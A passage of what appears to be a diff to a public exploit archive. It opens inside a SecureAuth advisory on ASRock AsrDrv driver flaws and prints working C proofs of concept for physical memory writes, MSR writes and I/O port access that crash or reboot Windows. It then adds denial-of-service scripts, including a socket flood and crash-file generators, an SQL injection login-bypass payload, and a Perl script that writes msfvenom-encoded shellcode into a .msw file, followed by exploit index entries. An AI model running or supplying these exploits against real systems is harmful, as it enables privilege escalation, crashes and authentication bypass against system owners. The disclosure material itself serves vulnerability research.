printf("CR3 (PageDir): %llx\n", a);
|
||||
printf("press ENTER for instant system CRASH\n");
|
||||
getchar();
|
||||
|
||||
a = ASROCK_WriteCR(3, 0xffff1111ffff2222);
|
||||
|
||||
CloseHandle(ghDriver);
|
||||
}
|
||||
-----/
|
||||
|
||||
7.2. *Arbitrary physical memory read/write*
|
||||
|
||||
[CVE-2018-10710]
|
||||
|
||||
AsrDrv's IOCTL code 0x22280C exposes a functionality to read and write
|
||||
arbitrary physical memory, this could be leveraged by a local attacker
|
||||
to elevate privileges.
|
||||
|
||||
Proof of Concept:
|
||||
|
||||
/-----
|
||||
// Asrock RGBLED PoC (arbitrary physical memory write)
|
||||
// This PoC demonstrates arbitrary write to physical memory.
|
||||
|
||||
#include <windows.h>
|
||||
#include <stdio.h>
|
||||
|
||||
#define IOCTL_ASROCK_WRITEPH 0x22280C
|
||||
|
||||
HANDLE ghDriver = 0;
|
||||
|
||||
#pragma pack (push,1)
|
||||
|
||||
typedef struct _ASROCK_PH_STRUCT {
|
||||
ULONG64 destPhysical;
|
||||
DWORD size;
|
||||
DWORD unk0;
|
||||
ULONG64 src;
|
||||
} ASROCK_PH_STRUCT;
|
||||
|
||||
#pragma pack(pop)
|
||||
|
||||
BOOL ASROCK_ph_memcpy(ULONG64 dest, ULONG64 src, DWORD size)
|
||||
{
|
||||
ASROCK_PH_STRUCT mystructIn = { dest, size, 0, src};
|
||||
|
||||
BYTE outbuffer[0x30] = { 0 };
|
||||
|
||||
DWORD returned = 0;
|
||||
DeviceIoControl(ghDriver, IOCTL_ASROCK_WRITEPH, (LPVOID)&mystructIn, sizeof(mystructIn), (LPVOID)outbuffer, sizeof(outbuffer), &returned, NULL);
|
||||
if (returned) {
|
||||
return TRUE;
|
||||
}
|
||||
return FALSE;
|
||||
}
|
||||
|
||||
BOOL InitDriver()
|
||||
{
|
||||
char szDeviceName[] = "\\\\.\\AsrDrv101";
|
||||
ghDriver = CreateFile(szDeviceName, GENERIC_READ | GENERIC_WRITE, FILE_SHARE_READ | FILE_SHARE_WRITE, 0, OPEN_EXISTING, FILE_ATTRIBUTE_NORMAL, NULL);
|
||||
|
||||
if (ghDriver == INVALID_HANDLE_VALUE) {
|
||||
printf("Cannot get handle to driver \'%s\'- GetLastError:%d\n", szDeviceName, GetLastError());
|
||||
return FALSE;
|
||||
}
|
||||
return TRUE;
|
||||
}
|
||||
|
||||
int main(int argc, char * argv[])
|
||||
{
|
||||
printf("Asrock RGBLED PoC (arbitrary physical memory write) - pnx!/CORE\n");
|
||||
if (!InitDriver()) {
|
||||
exit(0);
|
||||
}
|
||||
|
||||
printf("press ENTER for SYSTEM CRASH\n");
|
||||
getchar();
|
||||
ULONG64 data = 0xFFFF1111FFFF2222;
|
||||
for (unsigned int i = 0; i < 0xffffffff; i += 0x1000) {
|
||||
printf(".");
|
||||
ASROCK_ph_memcpy(i, (ULONG64)&data, 8);
|
||||
}
|
||||
|
||||
CloseHandle(ghDriver);
|
||||
return 0;
|
||||
}
|
||||
-----/
|
||||
|
||||
7.3. *MSR Register access*
|
||||
|
||||
[CVE-2018-10711]
|
||||
|
||||
AsrDrv exposes functionality to read and write Machine Specific
|
||||
Registers (MSRs). This could be leveraged to execute arbitrary ring-0
|
||||
code.
|
||||
|
||||
Proof of Concept:
|
||||
|
||||
/-----
|
||||
// Asrock RGBLED PoC demonstrating non-privileged access to MSR registers
|
||||
|
||||
// This PoC demonstrates non privileged MSR access by reading
|
||||
// IA32_LSTAR value (leaks a kernel function pointer bypassing KASLR)
|
||||
// and then writing garbage to it (instant BSOD!)
|
||||
|
||||
#include <windows.h>
|
||||
#include <stdio.h>
|
||||
|
||||
#define IOCTL_ASROCK_RDMSR 0x222848
|
||||
#define IOCTL_ASROCK_WRMSR 0x22284C
|
||||
|
||||
HANDLE ghDriver = 0;
|
||||
|
||||
#pragma pack (push,1)
|
||||
|
||||
typedef struct _ASROCK_MSRIO_STRUCT {
|
||||
ULONG64 valLO; //
|
||||
DWORD reg; //
|
||||
ULONG64 valHI; //
|
||||
} ASROCK_MSRIO_STRUCT;
|
||||
|
||||
#pragma pack(pop)
|
||||
|
||||
#define IOCTLMACRO(iocontrolcode, size) \
|
||||
ASROCK_MSRIO_STRUCT outbuffer = { 0 };\
|
||||
DWORD returned = 0; \
|
||||
DeviceIoControl(ghDriver, ##iocontrolcode##, (LPVOID)&inbuffer, ##size##, (LPVOID)&outbuffer, sizeof(outbuffer), &returned, NULL); \
|
||||
return (outbuffer.valHI<<0x20 | outbuffer.valLO); \
|
||||
|
||||
ULONG64 GIO_RDMSR(DWORD reg)
|
||||
{
|
||||
ASROCK_MSRIO_STRUCT inbuffer = { 0, reg };
|
||||
IOCTLMACRO(IOCTL_ASROCK_RDMSR, 20)
|
||||
}
|
||||
|
||||
ULONG64 GIO_WRMSR(DWORD reg, ULONG64 value)
|
||||
{
|
||||
ASROCK_MSRIO_STRUCT inbuffer = { value & 0xffffffff, reg, (value & 0xffffffff00000000)>>0x20 };
|
||||
IOCTLMACRO(IOCTL_ASROCK_WRMSR, 20)
|
||||
}
|
||||
|
||||
BOOL InitDriver()
|
||||
{
|
||||
char szDeviceName[] = "\\\\.\\AsrDrv101";
|
||||
ghDriver = CreateFile(szDeviceName, GENERIC_READ | GENERIC_WRITE, FILE_SHARE_READ | FILE_SHARE_WRITE, 0, OPEN_EXISTING, FILE_ATTRIBUTE_NORMAL, NULL);
|
||||
|
||||
if (ghDriver == INVALID_HANDLE_VALUE) {
|
||||
printf("Cannot get handle to driver object \'%s\'- GetLastError:%d\n", szDeviceName, GetLastError());
|
||||
return FALSE;
|
||||
}
|
||||
return TRUE;
|
||||
}
|
||||
|
||||
int main(int argc, char * argv[])
|
||||
{
|
||||
printf("Asrock RGBLED PoC (MSR access) - pnx!/CORE\n");
|
||||
|
||||
if (!InitDriver()) {
|
||||
printf("InitDriver failed! - aborting...\n");
|
||||
exit(0);
|
||||
}
|
||||
|
||||
ULONG64 a = GIO_RDMSR(0xC0000082);
|
||||
printf("IA322_LSTAR: %llx (nt!KiSystemCall64)\n", a);
|
||||
printf("press ENTER for instant BSOD\n");
|
||||
getchar();
|
||||
|
||||
a = GIO_WRMSR(0xC0000082, 0xffff1111ffff2222);
|
||||
return (int)CloseHandle(ghDriver);
|
||||
}
|
||||
-----/
|
||||
|
||||
7.4. *Port mapped I/O access*
|
||||
|
||||
[CVE-2018-10712]
|
||||
|
||||
AsrDrv exposes functionality to read/write data from/to IO ports. This
|
||||
could be leveraged in a number of ways to ultimately run code with
|
||||
elevated privileges.
|
||||
|
||||
/-----
|
||||
// Asrock RGBLED PoC demonstrating non-privileged access to IO ports
|
||||
|
||||
#include <windows.h>
|
||||
#include <stdio.h>
|
||||
|
||||
#define IOCTL_ASROCK_PORTREADB 0x222810
|
||||
#define IOCTL_ASROCK_PORTWRITEB 0x222814
|
||||
|
||||
HANDLE ghDriver = 0;
|
||||
|
||||
#pragma pack (push,1)
|
||||
|
||||
typedef struct _ASROCK_CR_STRUCT {
|
||||
DWORD port;
|
||||
ULONG64 value;
|
||||
} ASROCK_CR_STRUCT;
|
||||
|
||||
#pragma pack(pop)
|
||||
|
||||
#define IOCTLMACRO(iocontrolcode, size) \
|
||||
BYTE outbuffer[0x10] = { 0 }; \
|
||||
DWORD returned = 0; \
|
||||
DeviceIoControl(ghDriver, ##iocontrolcode##, (LPVOID)&inbuffer, ##size##, (LPVOID)outbuffer, sizeof(outbuffer), &returned, NULL); \
|
||||
return outbuffer[1]; \
|
||||
|
||||
BYTE ASROCK_ReadPortB(DWORD port)
|
||||
{
|
||||
ASROCK_CR_STRUCT inbuffer = { port, 0};
|
||||
IOCTLMACRO(IOCTL_ASROCK_PORTREADB, 10)
|
||||
}
|
||||
|
||||
BYTE ASROCK_WritePortB(DWORD port, ULONG64 value)
|
||||
{
|
||||
ASROCK_CR_STRUCT inbuffer = { port, value};
|
||||
IOCTLMACRO(IOCTL_ASROCK_PORTWRITEB, 10)
|
||||
}
|
||||
|
||||
void Reboot()
|
||||
{
|
||||
BYTE cf9 = ASROCK_ReadPortB(0xcf9) & ~0x6;
|
||||
ASROCK_WritePortB(0xcf9, cf9 | 2);
|
||||
Sleep(50);
|
||||
ASROCK_WritePortB(0xcf9, cf9 | 0xe);
|
||||
Sleep(50);
|
||||
}
|
||||
|
||||
BOOL InitDriver()
|
||||
{
|
||||
char szDeviceName[] = "\\\\.\\AsrDrv101";
|
||||
ghDriver = CreateFile(szDeviceName, GENERIC_READ | GENERIC_WRITE, FILE_SHARE_READ | FILE_SHARE_WRITE, 0, OPEN_EXISTING, FILE_ATTRIBUTE_NORMAL, NULL);
|
||||
|
||||
if (ghDriver == INVALID_HANDLE_VALUE) {
|
||||
printf("Cannot get handle to driver object \'%s\'- GetLastError:%d\n", szDeviceName, GetLastError());
|
||||
return FALSE;
|
||||
}
|
||||
return TRUE;
|
||||
}
|
||||
|
||||
int main(int argc, char * argv[])
|
||||
{
|
||||
printf("Asrock RGBLED PoC (PMIO access) - pnx!/CORE\n");
|
||||
|
||||
if (!InitDriver()) {
|
||||
printf("InitDriver failed! - aborting...\n");
|
||||
exit(0);
|
||||
}
|
||||
|
||||
Reboot();
|
||||
return (int)CloseHandle(ghDriver);
|
||||
}
|
||||
-----/
|
||||
|
||||
8. *Report Timeline*
|
||||
2018-03-12: SecureAuth sent an initial notification to ASRock America
|
||||
Support.
|
||||
2018-03-13: ASRock confirmed the receipt and requested additional
|
||||
information in order to send it to its HQ.
|
||||
2018-03-13: SecureAuth answered saying that a draft advisory has been
|
||||
written, including a technical description, and requested for PGP keys
|
||||
in order to send it encrypted.
|
||||
2018-03-14: ASRock answered asking for the advisory in clear text.
|
||||
2018-03-14: SecureAuth sent the draft advisory to ASRock in clear text
|
||||
form.
|
||||
2018-03-14: ASRock confirmed the receipt and informed they would submit
|
||||
it to the HQ for validation.
|
||||
2018-03-23: SecureAuth requested a status update on the case.
|
||||
2018-03-23: ASRock answered saying they didn't have a reply from HQ.
|
||||
2018-03-26: ASRock notified SecureAuth they were still checking the
|
||||
reported vulnerabilities and requested additional time.
|
||||
2018-03-27: SecureAuth thanked the status update and informed ASRock
|
||||
that would be in contact the following week.
|
||||
2018-03-28: ASRock informed SecureAuth they checked the reported
|
||||
vulnerabilities and they would have a preliminary schedule for the fix
|
||||
at the end of April.
|
||||
2018-03-28: SecureAuth thanked ASRock's reply.
|
||||
2018-04-20: ASRock notified that the driver was modified and sent to
|
||||
SecureAuth the fixed applications and requested for a feedback.
|
||||
2018-04-23: SecureAuth acknowledged the reception of the fixed
|
||||
applications.
|
||||
2018-05-09: SecureAuth tested the modified driver and verified that the
|
||||
issues detailed in the proofs of concept were solved.
|
||||
For that reason, SecureAuth propose release date to be May 23rd.
|
||||
2018-05-09: ASRock thanked SecureAuth's update and forwarded the
|
||||
proposal to its HQ for a confirmation.
|
||||
2018-05-15: ASRock notified SecureAuth that they were going to deploy
|
||||
the new driver architecture into each ASRock utility.
|
||||
For the whole project, ASRock estimated to finish by the end of June.
|
||||
2018-05-15: SecureAuth thanked ASRock's update and asked if ASRock had
|
||||
planned to release a security note.
|
||||
2018-05-23: ASRock informed that each utility would include a release
|
||||
note with a security description.
|
||||
2018-06-15: SecureAuth requested ASRock a status update about its
|
||||
timescale.
|
||||
2018-06-09: ASRock forwarded the request to its HQ.
|
||||
2018-06-19: ASRock informed that they had started to upload the fixed
|
||||
drivers for one of the supported motherboard series
|
||||
and they were going to continue uploading the drivers for other models.
|
||||
2018-07-11: SecureAuth requested ASRock a status update.
|
||||
2018-07-11: ASRock replied saying they were still working on the upload
|
||||
process.
|
||||
2018-08-06: SecureAuth requested ASRock a new status update.
|
||||
2018-08-16: ASRock notified SecureAuth they had finished with the update
|
||||
process.
|
||||
2018-10-17: SecureAuth set October 25th as the publication date.
|
||||
2018-10-25: Advisory CORE-2018-0005 published.
|
||||
|
||||
9. *References*
|
||||
|
||||
[1] http://www.asrock.com/
|
||||
|
||||
10. *About SecureAuth Labs*
|
||||
|
||||
SecureAuth Labs, the research arm of SecureAuth Corporation, is charged
|
||||
with anticipating the future needs and requirements for information
|
||||
security technologies. We conduct research in several important areas of
|
||||
computer security, including identity-related attacks, system
|
||||
vulnerabilities and cyber-attack planning. Research includes problem
|
||||
formalization, identification of vulnerabilities, novel solutions and
|
||||
prototypes for new technologies. We regularly publish security
|
||||
advisories, primary research, technical publications, research blogs,
|
||||
project information, and shared software tools for public use at
|
||||
http://www.secureauth.com.
|
||||
|
||||
11. *About SecureAuth*
|
||||
|
||||
SecureAuth is leveraged by leading companies, their employees, their
|
||||
customers and their partners to eliminate identity-related breaches.
|
||||
As a leader in access management, identity governance, and penetration
|
||||
testing, SecureAuth is powering an identity security revolution by
|
||||
enabling people and devices to intelligently and adaptively access
|
||||
systems and data, while effectively keeping bad actors from doing harm.
|
||||
By ensuring the continuous assessment of risk and enablement of trust,
|
||||
SecureAuth's highly flexible Identity Security Automation (ISA) platform
|
||||
makes it easier for organizations to prevent the misuse of credentials
|
||||
and exponentially reduce the enterprise threat surface. To learn more,
|
||||
visit www.secureauth.com<http://www.secureauth.com>, call (949) 777-6959, or email us at
|
||||
info@secureauth.com<mailto:info@secureauth.com>
|
||||
|
||||
12. *Disclaimer*
|
||||
|
||||
The contents of this advisory are copyright (c) 2018 SecureAuth, and are
|
||||
licensed under a Creative Commons Attribution Non-Commercial Share-Alike
|
||||
3.0 (United States) License:
|
||||
http://creativecommons.org/licenses/by-nc-sa/3.0/us/
|
27
exploits/windows/dos/45732.txt
Normal file
27
exploits/windows/dos/45732.txt
Normal file
|
@ -0,0 +1,27 @@
|
|||
# Exploit Title: Modbus Slave 7.0.0 - Denial of Service (PoC)
|
||||
# Dork: N/A
|
||||
# Date: 2018-10-29
|
||||
# Exploit Author: Ihsan Sencan
|
||||
# Vendor Homepage: https://www.modbustools.com/
|
||||
# Software Link: https://www.modbustools.com/download/ModbusSlaveSetup32Bit.exe
|
||||
# Software Link: https://www.modbustools.com/download/ModbusSlaveSetup64Bit.exe
|
||||
# Version: 7.0.0
|
||||
# Category: Dos
|
||||
# Tested on: WiN7_x64/KaLiLinuX_x64
|
||||
# CVE: CVE-2018-18759
|
||||
|
||||
# POC:
|
||||
# 1)
|
||||
# F3 & Connection / Connect / Registration Key
|
||||
|
||||
#!/usr/bin/python
|
||||
|
||||
buffer = "A" * 603
|
||||
try:
|
||||
f=open("sie.txt","w")
|
||||
print "[+] Creating %s bytes evil payload.." %len(buffer)
|
||||
f.write(buffer)
|
||||
f.close()
|
||||
print "[+] File created!"
|
||||
except:
|
||||
print "File cannot be created"
|
25
exploits/windows_x86-64/dos/45705.py
Executable file
25
exploits/windows_x86-64/dos/45705.py
Executable file
|
@ -0,0 +1,25 @@
|
|||
# Exploit Title: Navicat 12.0.29 - 'SSH' Denial of Service (PoC)
|
||||
# Author: Rafael Alfaro
|
||||
# Discovery Date: 2018-10-27
|
||||
# Vendor Homepage: https://www.navicat.com/es/
|
||||
# Software Link : https://www.navicat.com/es/download/navicat-premium
|
||||
# Vulnerability Type: Denial of Service (DoS) Local
|
||||
# Tested on OS: Windows 7 x64 en, Windows 10 Home x64 es
|
||||
|
||||
# Steps to Produce the Crash:
|
||||
# 1.- Run python code : python Navicat-SSH.py
|
||||
# 2.- Open navicat.txt and copy content to clipboard
|
||||
# 3.- Open navicat.exe
|
||||
# 4.- Click "Conexion" and select "MySQL..."
|
||||
# 5.- In the "General" tab, give a name to the connection in "Nombre de Conexion" (i. e. conexion1).
|
||||
# 6.- In the "SSH" tab check "Uso de tunel SSH", then set and IP address to the "Host" textbox (i. e. 127.0.0.1) and write down a username in "Nombre de usuario" (i. e. admin).
|
||||
# 7.- Be sure that "Metodo de autentificacion" is set to "Contrasena" and finally paste Clipboard in "Contrasena".
|
||||
# 8.- Click "Aceptar".
|
||||
# 9.- Crashed!
|
||||
|
||||
# !/usr/bin/env python Navicat-SSH.py
|
||||
|
||||
buffer = "\x41" * 5000
|
||||
f = open("navicat.txt", "w")
|
||||
f.write(buffer)
|
||||
f.close()
|
22
exploits/windows_x86-64/dos/45708.py
Executable file
22
exploits/windows_x86-64/dos/45708.py
Executable file
|
@ -0,0 +1,22 @@
|
|||
# Exploit Title: AlienIP 2.41 - Denial of Service (PoC)
|
||||
# Author: Arturo de la Cruz Tellez
|
||||
# Discovery Date: 2018-10-17
|
||||
# Vendor Homepage: http://www.armcode.com
|
||||
# Tested Version: 2.41
|
||||
# Tested on OS: Microsoft Windows 10 Home Single Language x64
|
||||
# Versión 10.0.10240 compilación 10240
|
||||
|
||||
# PoC
|
||||
# Steps to produce the crash
|
||||
# 1.- Run python code : python AlienIP2.41.py
|
||||
# 2.- Open AlienIP2.41.txt and copy context to clipboard
|
||||
# 3.- Open AlienIP.exe
|
||||
# 4.- Paste clipboard on IP address or Country
|
||||
# 5.- Click in Locate host
|
||||
# 5.- Enter
|
||||
# 6.- Crashed alienip.exe dejo de funcionar
|
||||
|
||||
buffer = "\x41" * 200 + "." + "\x41" * 200 + "." + "\x41" * 200 + "." + "\x41" * 69
|
||||
f = open ("AlienIP2.41.txt", "w")
|
||||
f.write(buffer)
|
||||
f.close()
|
46
exploits/windows_x86-64/dos/45711.py
Executable file
46
exploits/windows_x86-64/dos/45711.py
Executable file
|
@ -0,0 +1,46 @@
|
|||
# Exploit Title: Local Server 1.0.9 - Denial of Service (PoC)
|
||||
# Dork: N/A
|
||||
# Date: 2018-10-29
|
||||
# Exploit Author: Ihsan Sencan
|
||||
# Vendor Homepage: http://www.ujang-rohidin.blogspot.com/
|
||||
# Software Link: https://sourceforge.net/projects/local-server/files/latest/download
|
||||
# Version: 1.0.9
|
||||
# Category: Dos
|
||||
# Tested on: WiN7_x64/KaLiLinuX_x64
|
||||
# CVE: CVE-2018-18756
|
||||
|
||||
# POC:
|
||||
# 1)
|
||||
|
||||
#!/usr/bin/python
|
||||
import socket
|
||||
|
||||
print """
|
||||
\\\|///
|
||||
\\ - - //
|
||||
( @ @ )
|
||||
----oOOo--(_)-oOOo----
|
||||
Local Server 1.0.9 Dos
|
||||
Ihsan Sencan
|
||||
---------------Ooooo----
|
||||
( )
|
||||
ooooO ) /
|
||||
( ) (_/
|
||||
\ (
|
||||
\_)
|
||||
"""
|
||||
Ip = raw_input("[Ip]: ")
|
||||
Port = 4008 # Default port
|
||||
|
||||
d=[]
|
||||
c=0
|
||||
while 1:
|
||||
try:
|
||||
d.append(socket.create_connection((Ip,Port)))
|
||||
d[c].send("DOOM")
|
||||
print "Sie!"
|
||||
c+=1
|
||||
except socket.error:
|
||||
print "+ Done! +"
|
||||
raw_input()
|
||||
break
|
57
exploits/windows_x86-64/local/45709.vb
Normal file
57
exploits/windows_x86-64/local/45709.vb
Normal file
|
@ -0,0 +1,57 @@
|
|||
# Exploit Title: School Equipment Monitoring System 1.0 - 'login' SQL Injection
|
||||
# Dork: N/A
|
||||
# Date: 2018-10-29
|
||||
# Exploit Author: Ihsan Sencan
|
||||
# Vendor Homepage: https://www.sourcecodester.com/users/janobe
|
||||
# Software Link: https://www.sourcecodester.com/sites/default/files/download/janobe/sems_0.zip
|
||||
# Version: 1.0
|
||||
# Category: Windows
|
||||
# Tested on: WiN7_x64/KaLiLinuX_x64
|
||||
# CVE: CVE-2018-18806
|
||||
|
||||
# POC:
|
||||
# 1)
|
||||
|
||||
User: '||(SEleCT 'Efe' FRoM DuaL WheRE 113=113 AnD (SEleCT 64 FRom(SELeCT CoUNT(*),ConCAT(ConCAT(0x203a20,UsER(),DAtABAsE(),VErSIoN()),(SelEcT (ELT(64=64,1))),FLooR(RAnD(0)*2))x FrOM INFOrMATIoN_SchEMA.pLUGINS GroUP By x)a))||'
|
||||
Pass: Null
|
||||
|
||||
# POC:
|
||||
# 2)
|
||||
# User: 'or 1=1 or ''='
|
||||
# Pass: Null
|
||||
#
|
||||
# https://4.bp.blogspot.com/-ILPqY1iygBY/W9YnEkjH9fI/AAAAAAAAENQ/34rcdTiwPDIeBzPhuj8roYPMIPOshiFvwCLcBGAs/s1600/sql2.png
|
||||
#
|
||||
#[PATH]/include/user.vb / 28 / '" & username & "'
|
||||
#....
|
||||
#24 Public Sub login(ByVal username As Object, ByVal pass As Object)
|
||||
#25 Try
|
||||
#26
|
||||
#27 con.Open()
|
||||
#28 reloadtxt("SELECT * FROM `tbluseraccounts` WHERE Username= '" & username & "' and Pass = sha1('" & pass & "')")
|
||||
#29
|
||||
#30
|
||||
#31 If dt.Rows.Count > 0 Then
|
||||
#32
|
||||
#33 If dt.Rows(0).Item("Role") = "Administrator" Then
|
||||
#34 MsgBox("Welcome " & dt.Rows(0).Item("Role"))
|
||||
#35 Form1.Text = "User :" & dt.Rows(0).Item("Fullname")
|
||||
#36 Form1.LogoutToolStripMenuItem.Text = "Logout"
|
||||
#37 visibleMenu("true", "admin")
|
||||
#38 LoginForm1.Close()
|
||||
#39 Else
|
||||
#40 visibleMenu("true", "not admin")
|
||||
#41 Form1.LogoutToolStripMenuItem.Text = "Logout"
|
||||
#42 LoginForm1.Close()
|
||||
#43 End If
|
||||
#44
|
||||
#45 Else
|
||||
#46 MsgBox("Acount doest not exits!", MsgBoxStyle.Information)
|
||||
#47 End If
|
||||
#48 Catch ex As Exception
|
||||
#49 MsgBox(ex.Message)
|
||||
#50 End Try
|
||||
#51 con.Close()
|
||||
#52 da.Dispose()
|
||||
#53 End Sub
|
||||
#....
|
43
exploits/windows_x86/local/45710.pl
Executable file
43
exploits/windows_x86/local/45710.pl
Executable file
|
@ -0,0 +1,43 @@
|
|||
# Exploit Title: Modbus Slave PLC 7 - '.msw' Buffer Overflow (PoC)
|
||||
# Author: Kağan Çapar
|
||||
# Discovery Date: 2018-10-27
|
||||
# Software Link: https://www.modbustools.com/download/ModbusSlaveSetup32Bit.exe
|
||||
# Vendor Homepage : https://www.modbustools.com
|
||||
# Tested Version: 7
|
||||
# Tested on OS: Windows XP SP3 *ENG
|
||||
# other version should be affected
|
||||
# About software : Modbus Slave is for simulating up to 32 slave devices in 32 windows!.
|
||||
# Speed up your PLC programming with this simulating tools. Used for SCADA systems.
|
||||
# Modbus is a serial communications protocol originally published by Schneider Electric
|
||||
# Steps to Reproduce: Run the perl exploit script, it will create a new
|
||||
# file with the name "exploit.msw" and Drag on to "mbslave.exe"
|
||||
# you will see a loop and crash on software
|
||||
# Greetz : cwd-onkan-badko-key-akkus
|
||||
|
||||
# ! /usr/bin/perl
|
||||
|
||||
# Dump of assembler code for function loop:
|
||||
# 0x0000555555558030 <+0>: mov $0x1e3b563c,%ebx
|
||||
# 0x0000555555558035 <+5>: fld %st(4)
|
||||
# 0x0000555555558037 <+7>: fnstenv -0xc(%rsp)
|
||||
# 0x000055555555803b <+11>: pop %rax
|
||||
# 0x000055555555803c <+12>: sub %ecx,%ecx
|
||||
# 0x000055555555803e <+14>: mov $0x1,%cl
|
||||
# 0x0000555555558040 <+16>: xor %ebx,0x14(%rax)
|
||||
# 0x0000555555558043 <+19>: add $0x4,%eax
|
||||
# 0x0000555555558046 <+22>: add 0x10(%rax),%ebx
|
||||
# 0x0000555555558049 <+25>: fisubs 0xe0d0(%rbx)
|
||||
|
||||
# msfvenom -p generic/tight_loop --platform windows_86 -f perl -e x86/shikata_ga_nai
|
||||
# print /x &loop
|
||||
# $1 = 0x555555558030
|
||||
|
||||
open(code, ">exploit.msw");
|
||||
binmode(code);
|
||||
$loop =
|
||||
"\xbb\x3c\x56\x3b\x1e\xd9\xc4\xd9\x74\x24\xf4\x58\x2b\xc9" .
|
||||
"\xb1\x01\x31\x58\x14\x83\xc0\x04\x03\x58\x10\xde\xa3\xd0" .
|
||||
"\xe0";
|
||||
|
||||
print code $loop;
|
||||
close(code);
|
|
@ -6158,6 +6158,13 @@ id,file,description,date,author,type,platform,port
|
|||
45679,exploits/windows_x86-64/dos/45679.py,"BORGChat 1.0.0 build 438 - Denial of Service (PoC)",2018-10-25,"Ihsan Sencan",dos,windows_x86-64,
|
||||
45670,exploits/windows_x86/dos/45670.txt,"Adult Filter 1.0 - Denial of Service (PoC)",2018-10-24,"Beren Kuday GÖRÜN",dos,windows_x86,
|
||||
45694,exploits/linux/dos/45694.c,"libtiff 4.0.9 - Decodes Arbitrarily Sized JBIG into a Target Buffer",2018-10-25,"Google Security Research",dos,linux,
|
||||
45705,exploits/windows_x86-64/dos/45705.py,"Navicat 12.0.29 - 'SSH' Denial of Service (PoC)",2018-10-29,"Rafael Alfaro",dos,windows_x86-64,
|
||||
45708,exploits/windows_x86-64/dos/45708.py,"AlienIP 2.41 - Denial of Service (PoC)",2018-10-29,"Arturo de la Cruz Tellez",dos,windows_x86-64,
|
||||
45711,exploits/windows_x86-64/dos/45711.py,"Local Server 1.0.9 - Denial of Service (PoC)",2018-10-29,"Ihsan Sencan",dos,windows_x86-64,
|
||||
45714,exploits/linux/dos/45714.c,"systemd - reexec State Injection",2018-10-29,"Google Security Research",dos,linux,
|
||||
45715,exploits/linux/dos/45715.txt,"systemd - chown_one() can Dereference Symlinks",2018-10-29,"Google Security Research",dos,linux,
|
||||
45716,exploits/windows/dos/45716.txt,"ASRock Drivers - Privilege Escalation",2018-10-29,SecureAuth,dos,windows,
|
||||
45732,exploits/windows/dos/45732.txt,"Modbus Slave 7.0.0 - Denial of Service (PoC)",2018-10-29,"Ihsan Sencan",dos,windows,
|
||||
3,exploits/linux/local/3.c,"Linux Kernel 2.2.x/2.4.x (RedHat) - 'ptrace/kmod' Local Privilege Escalation",2003-03-30,"Wojciech Purczynski",local,linux,
|
||||
4,exploits/solaris/local/4.c,"Sun SUNWlldap Library Hostname - Local Buffer Overflow",2003-04-01,Andi,local,solaris,
|
||||
12,exploits/linux/local/12.c,"Linux Kernel < 2.4.20 - Module Loader Privilege Escalation",2003-04-14,KuRaK,local,linux,
|
||||
|
@ -10054,6 +10061,8 @@ id,file,description,date,author,type,platform,port
|
|||
45687,exploits/windows_x86/local/45687.txt,"Adult Filter 1.0 - Buffer Overflow (SEH)",2018-10-25,AkkuS,local,windows_x86,
|
||||
45696,exploits/windows/local/45696.rb,"WebEx - Local Service Permissions Exploit (Metasploit)",2018-10-25,Metasploit,local,windows,
|
||||
45697,exploits/multiple/local/45697.txt,"xorg-x11-server < 1.20.3 - Local Privilege Escalation",2018-10-25,"Hacker Fantastic",local,multiple,
|
||||
45709,exploits/windows_x86-64/local/45709.vb,"School Equipment Monitoring System 1.0 - 'login' SQL Injection",2018-10-29,"Ihsan Sencan",local,windows_x86-64,
|
||||
45710,exploits/windows_x86/local/45710.pl,"Modbus Slave PLC 7 - '.msw' Buffer Overflow (PoC)",2018-10-29,"Kağan Çapar",local,windows_x86,
|
||||
1,exploits/windows/remote/1.c,"Microsoft IIS - WebDAV 'ntdll.dll' Remote Overflow",2003-03-23,kralor,remote,windows,80
|
||||
2,exploits/windows/remote/2.c,"Microsoft IIS 5.0 - WebDAV Remote",2003-03-24,RoMaNSoFt,remote,windows,80
|
||||
5,exploits/windows/remote/5.c,"Microsoft Windows 2000/NT 4 - RPC Locator Service Remote Overflow",2003-04-03,"Marcin Wolak",remote,windows,139
|
||||
|
@ -16897,6 +16906,7 @@ id,file,description,date,author,type,platform,port
|
|||
45658,exploits/windows/remote/45658.txt,"ServersCheck Monitoring Software 14.3.3 - Arbitrary File Write",2018-10-23,hyp3rlinx,remote,windows,
|
||||
45671,exploits/linux/remote/45671.py,"exim 4.90 - Remote Code Execution",2018-10-24,hackk.gr,remote,linux,25
|
||||
45695,exploits/windows/remote/45695.rb,"WebExec - Authenticated User Code Execution (Metasploit)",2018-10-25,Metasploit,remote,windows,
|
||||
45712,exploits/linux/remote/45712.py,"Paramiko 2.4.1 - Authentication Bypass",2018-10-29,"Adam Brown",remote,linux,
|
||||
6,exploits/php/webapps/6.php,"WordPress 2.0.2 - 'cache' Remote Shell Injection",2006-05-25,rgod,webapps,php,
|
||||
44,exploits/php/webapps/44.pl,"phpBB 2.0.5 - SQL Injection Password Disclosure",2003-06-20,"Rick Patel",webapps,php,
|
||||
47,exploits/php/webapps/47.c,"phpBB 2.0.4 - PHP Remote File Inclusion",2003-06-30,Spoofed,webapps,php,
|
||||
|
@ -40214,3 +40224,26 @@ id,file,description,date,author,type,platform,port
|
|||
45699,exploits/php/webapps/45699.txt,"MPS Box 0.1.8.0 - Arbitrary File Upload",2018-10-26,"Ihsan Sencan",webapps,php,
|
||||
45700,exploits/php/webapps/45700.txt,"Delta Sql 1.8.2 - 'id' SQL Injection",2018-10-26,"Ihsan Sencan",webapps,php,
|
||||
45701,exploits/php/webapps/45701.txt,"Veterinary Clinic Management 00.02 - 'editpetnum' SQL Injection",2018-10-26,"Ihsan Sencan",webapps,php,
|
||||
45703,exploits/php/webapps/45703.txt,"Open Faculty Evaluation System 5.6 - 'batch_name' SQL Injection",2018-10-29,"Ihsan Sencan",webapps,php,
|
||||
45704,exploits/php/webapps/45704.txt,"Grapixel New Media 2 - 'pageref' SQL Injection",2018-10-29,"Berk Dusunur",webapps,php,
|
||||
45706,exploits/aspx/webapps/45706.vb,"Library Management System 1.0 - 'frmListBooks' SQL Injection",2018-10-29,"Ihsan Sencan",webapps,aspx,
|
||||
45707,exploits/php/webapps/45707.txt,"Open Faculty Evaluation System 7 - 'batch_name' SQL Injection",2018-10-29,"Ihsan Sencan",webapps,php,
|
||||
45713,exploits/php/webapps/45713.txt,"Card Payment 1.0 - Cross-Site Request Forgery (Update Admin)",2018-10-29,"Ihsan Sencan",webapps,php,
|
||||
45717,exploits/php/webapps/45717.txt,"MTGAS MOGG Web Simulator Script - SQL Injection",2018-10-29,"Meisam Monsef",webapps,php,80
|
||||
